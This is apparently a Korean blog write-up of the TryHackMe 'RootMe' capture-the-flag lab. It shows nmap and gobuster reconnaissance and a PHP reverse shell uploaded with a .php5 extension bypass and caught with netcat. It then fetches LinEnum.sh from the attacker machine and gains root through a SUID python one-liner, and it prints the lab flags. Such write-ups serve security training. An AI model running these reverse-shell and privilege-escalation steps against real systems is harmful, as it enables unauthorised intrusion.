Oh! JUN
[redraccoon] ## rootme ## 본문
TryHackMe | 모의해킹 기초
레드라쿤 모의해킹 기초 실습방
tryhackme.com
[rootme]
sudo nmap -sV 10.10.226.25 -T4
---------------------------------------------------------------------------------
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-06 23:55 EST
Nmap scan report for 10.10.226.25
Host is up (0.47s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.05 seconds
---------------------------------------------------------------------------------
sudo nmap -A 10.10.226.25 -T5 -p 22,80
---------------------------------------------------------------------------------
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 00:07 EST
Nmap scan report for 10.10.226.25
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4ab9160884c25448ba5cfd3f225f2214 (RSA)
| 256 a9a686e8ec96c3f003cd16d54973d082 (ECDSA)
|_ 256 22f6b5a654d9787c26035a95f3f9dfcd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 clos
ed port
Aggressive OS guesses: Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linu
x 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Lin
ux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 152.60 ms 10.4.0.1
2 ... 3
4 407.76 ms 10.10.226.25
OS and Service detection performed. Please report any incorrect results at https://nmap.org/su
bmit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.14 seconds
---------------------------------------------------------------------------------
# 'http://10.10.226.25/' 사이트 대상으로 /usr/share/wordlists/dirb/common.txt의 wordlist 사용해서 디렉터리 브루트 포싱하기
gobuster dir -u http://10.10.226.25/ -w /usr/share/wordlists/dirb/common.txt -f -x php -t 100
===============================================================
Gobuster v3.6 [174/277]
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.226.25/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php/ (Status: 403) [Size: 277]
/.htpasswd/ (Status: 403) [Size: 277]
/.htpasswd.php/ (Status: 403) [Size: 277]
/.htaccess/ (Status: 403) [Size: 277]
/.hta/ (Status: 403) [Size: 277]
/.hta.php/ (Status: 403) [Size: 277]
/.htaccess.php/ (Status: 403) [Size: 277]
Progress: 2171 / 9230 (23.52%)[ERROR] Get "http://10.10.226.25/activeCollab/": context deadlin
e exceeded (Client.Timeout exceeded while awaiting headers)
/css/ (Status: 200) [Size: 1125]
/icons/ (Status: 403) [Size: 277]
/index.php/ (Status: 200) [Size: 616]
/index.php/ (Status: 200) [Size: 616]
/js/ (Status: 200) [Size: 958]
/panel/ (Status: 200) [Size: 732]
/server-status/ (Status: 403) [Size: 277]
Progress: 7867 / 9230 (85.23%)[ERROR] Get "http://10.10.226.25/press_releases/": context deadl
ine exceeded (Client.Timeout exceeded while awaiting headers)
/uploads/ (Status: 200) [Size: 743]
Progress: 9228 / 9230 (99.98%)[ERROR] Get "http://10.10.226.25/Super-Admin/": context deadline
exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================
# 파일 업로드 기능 페이지
http://10.10.226.25/panel/
# 파일 업로드 확인 페이지
http://10.10.226.25/uploads/
--------------------------------------------------------
Index of /uploads
======================================================
Name Last modified Size Description
======================================================
Parent Directory -
php-reverse-shell.php5 2024-02-07 05:43 5.4K
======================================================
Apache/2.4.29 (Ubuntu) Server at 10.10.226.25 Port 80
--------------------------------------------------------
# .php reverse shell 파일 찾기
find / -name "*php-reverse-shell*" 2>/dev/null
--------------------------------------------------------------
/usr/share/webshells/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/laudanum/php/php-reverse-shell.php
--------------------------------------------------------------
sudo mousepad php-reverse-shell.php
----------------------------------------
$VERSION = "1.0";
$ip = '10.4.61.73'; // 본인 VPN IP
$port = 1234; // 상관없음
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
----------------------------------------
# 해당 웹 페이지에서 'php-reverse-shell.php'업로드하기
http://10.10.226.25/panel/
# 업로드가 안됨.
# php => php5로 확장자 변경하고 다시 업로드
cp php-reverse-shell.php php-reverse-shell.php5
# 공격대상에서 리버스 받을 포트 열어놓기
nc -lvnp 1234
-----------------------------
listening on [any] 1234 ...
-----------------------------
# 헤당 웹 페이지에서 'php-reverse-shell.php5'실행
http://10.10.226.25/uploads/
-----------------------------------------------------------------------------------------------
listening on [any] 1234 ...
connect to [10.4.61.73] from (UNKNOWN) [10.10.226.25] 36320
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_
64 GNU/Linux
05:47:49 up 54 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
-----------------------------------------------------------------------------------------------
# Python 스크립트를 사용하여 새로운 bash 쉘 세션을 생성하는 명령어
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
-------------------
www-data@rootme:/$
-------------------
# 'LinEnum.sh' 코드를 kali로 가져옴
# 'LinEnum.sh': 리눅스 시스템에서 정보 수집과 취약점 탐색을 도와주는 스크립트
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# 'kali'에서 웹 8443포트 열음(공격대상에서 직접 못 받아와서 'kali'을 통해 'LinEnum.sh' 받으려고)
python3 -m http.server 8443
# /dev/shm : 휘발성 디렉토리로 재부팅하면 삭제됨, 보안 취약점을 이용한 공격에서 임시 파일을 저장하는 공간으로 사용
www-data@rootme:/$ cd /dev/shm
# 'kali'에서 LinEnum.sh 가져옴
www-data@rootme:/dev/shm$ wget http://10.4.61.73:8443/LinEnum.sh
# 실행 권한 부여
www-data@rootme:/dev/shm$ chmod +x ./LinEnum.sh
# LinEnum.sh 실행
# /usr/bin/python 파일은 SUID가 설정됨.
www-data@rootme:/dev/shm$ ./LinEnum.sh
------------------------------------------------------------
[+] Possibly interesting SUID files:
-rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
------------------------------------------------------------
# Python 스크립트를 사용하여 새로운 쉘 세션을 생성하고, 이 쉘 세션에서는 부모 프로세스의 권한을 상속
# 결과를 분석해 보면, www-data 사용자로 로그인되어 있지만, 유효 사용자 ID와 유효 그룹 ID는 root(0)로, root 권한을 얻었음을 보여줌. 이는 일반적으로 시스템에서 보안 취약점을 이용하여 권한 상승(privilege escalation)을 수행했음을 의미
# 참고 : https://gtfobins.github.io/gtfobins/python/#suid
www-data@rootme:/$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
---------------------------------------------------------------------------------------
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
---------------------------------------------------------------------------------------
# find / -name "user.txt" 2>/dev/null
------------------------------------
find / -name "user.txt" 2>/dev/null
/var/www/user.txt
------------------------------------
# cat /var/www/user.txt
-----------------------
cat /var/www/user.txt
THM{y0u_g0t_a_sh3ll}
-----------------------
# find / -name "root.txt" 2>/dev/null
------------------------------------
find / -name "root.txt" 2>/dev/null
/root/root.txt
------------------------------------
# cat /root/root.txt
--------------------------
cat /root/root.txt
THM{pr1v1l3g3_3sc4l4t10n}
--------------------------'문제풀이 > Redraccoon' 카테고리의 다른 글
| [redraccoon] ## Catch me if you can ## (1) | 2024.02.06 |
|---|---|
| [redraccoon] ## Robots ## (0) | 2024.02.06 |
| [redraccoon] ## RemoteWebAdm ## (0) | 2024.02.06 |
| [redraccoon] rcity22 :Morse, steganography (0) | 2024.02.05 |
'문제풀이/Redraccoon' Related Articles
more
